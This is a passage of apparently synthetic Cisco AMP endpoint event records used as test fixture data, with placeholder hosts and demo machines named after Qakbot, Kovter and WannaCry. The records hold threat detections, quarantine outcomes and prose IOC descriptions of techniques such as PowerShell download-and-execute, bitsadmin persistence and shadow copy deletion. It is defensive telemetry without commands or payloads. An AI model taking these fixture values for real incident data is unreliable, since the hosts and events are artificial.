IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610621237,"start_date":"2021-01-14T10:47:17+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Command_Line_Arguments_Kovter","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b6:9c:d0:89:b8:66"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa"},"parent":{"disposition":"Clean","identity":{"sha256":"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1476905066228000300,"timestamp":1610621237,"timestamp_nanoseconds":228000000,"date":"2021-01-14T10:47:17+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621237,"start_date":"2021-01-14T10:47:17+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Command_Line_Arguments_Kovter","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b6:9c:d0:89:b8:66"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa"},"parent":{"disposition":"Clean","identity":{"sha256":"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":758000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411425813945647106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":758000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411425813945647105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":742000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411425813945647106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"AySxs.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\AySxs.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":742000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411425813945647105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837","sha1":"128aa78059540cf0cdae2a3cea30cd80e00f2046","md5":"c877b67a5733c59d0d8ed8d519df0c91"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533243623469744000,"timestamp":1610619329,"timestamp_nanoseconds":596000000,"date":"2021-01-14T10:15:29+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241347137077000,"timestamp":1610618799,"timestamp_nanoseconds":657000000,"date":"2021-01-14T10:06:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241347137077251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"BIT657.tmp","file_path":"\\\\?\\C:\\BIT657.tmp","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850","sha1":"cf162622e29bca072d01b274fbbc3ceaacdd13c7","md5":"0fe5be3811a98ee6a9c997d3812d911a"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241347137077000,"timestamp":1610618799,"timestamp_nanoseconds":657000000,"date":"2021-01-14T10:06:39+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6533241347137077251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":525000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6533241145273614337","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":619000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241145273614338","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"SqGGuYXyy.exe","file_path":"\\\\?\\C:\\SqGGuYXyy.exe","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850","sha1":"cf162622e29bca072d01b274fbbc3ceaacdd13c7","md5":"0fe5be3811a98ee6a9c997d3812d911a"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":525000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241145273614337","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"BIT4BBF.tmp","file_path":"\\\\?\\C:\\BIT4BBF.tmp","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":619000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6533241145273614338","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739875754000,"timestamp":1610618750,"timestamp_nanoseconds":875739000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The Windows Scripting Host (WScript.exe) was used to execute a file with a fake benign extension prior to a scripting extension. This is indicative of an attempt to conceal the malicious intent of the file and to trick the user into opening it.","short_description":"W32.WScriptExecuteFakeExtension.ioc"},"file":{"disposition":"Clean","file_name":"WScript.exe","file_path":"/C:/Windows/System32/WScript.exe","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"},"parent":{"disposition":"Clean","identity":{"sha256":"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739868158500,"timestamp":1610618750,"timestamp_nanoseconds":868146000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Bitsadmin is a command-line tool that can be used to create, download or upload jobs and monitor their progress. However, it can also be used to maintain persistence and evade checks for usual persistence mechanisms. An attacker with Administrator's rights can use the setnotifycmdline option to create a persistent job and then specify a /Resume option at a later time to execute the job. This mechanism allows the malware to survive reboots since the job is run repeatedly after a system restart. Moreover, Bitsadmin by default downloads files unless the destination server is running IIS with the required server component and /UPLOAD is specified in the command-line. While this is not by itself malicious, the command-line needs to be reviewed to ascertain the origin and intent.","short_description":"W32.Bitsadmin.ioc"},"file":{"disposition":"Clean","file_name":"bitsadmin.exe","file_path":"/C:/Windows/System32/bitsadmin.exe","identity":{"sha256":"838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00"},"parent":{"disposition":"Clean","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739846959000,"timestamp":1610618750,"timestamp_nanoseconds":846943000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Windows Script Host (wscript.exe) was used to execute a JavaScript file inside a zip archive. This attack vector is increasingly being used by ransomware. This may not be necessarily malicious but it needs further investigation to determine if the executed JavaScript is indeed malicious.","short_description":"W32.WScriptLaunchedZippedJS.ioc"},"file":{"disposition":"Clean","file_name":"WScript.exe","file_path":"/C:/Windows/System32/WScript.exe","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"},"parent":{"disposition":"Clean","identity":{"sha256":"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1494576726048000300,"timestamp":1610618696,"timestamp_nanoseconds":48000000,"date":"2021-01-14T10:04:56+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618696,"start_date":"2021-01-14T10:04:56+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.","short_description":"W32.PossibleRansomwareShadowCopyDeletion.ioc"},"file":{"disposition":"Clean","file_name":"vssadmin.exe","file_path":"/C:/windows/system32/vssadmin.exe","identity":{"sha256":"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10"},"parent":{"disposition":"Clean","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1494576727672000300,"timestamp":1610618689,"timestamp_nanoseconds":672000000,"date":"2021-01-14T10:04:49+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610618689,"start_date":"2021-01-14T10:04:49+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The BCDEdit command displays and modifies information about the boot options for Windows Vista and later Windows operating systems. In this case, it was used to disable automatic start up of recovery mode at boot susequent to a failure. Malware, such as ransomware, may use this to prevent the user from booting Windows into a safe mode or recovering a previous setting.","short_description":"W32.BCDEditDisableRecovery.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/windows/system32/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1458617561791000300,"timestamp":1610618620,"timestamp_nanoseconds":791000000,"date":"2021-01-14T10:03:40+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618620,"start_date":"2021-01-14T10:03:40+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"A file containing a benign extension prior to the .exe extension was executed. This is indicative of suspicious behaviour in an attempt to conceal the malicious intent of the file.","short_description":"W32.FakeExtensionExec.RET"},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"/c:/users/rsteadman/downloads/report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not 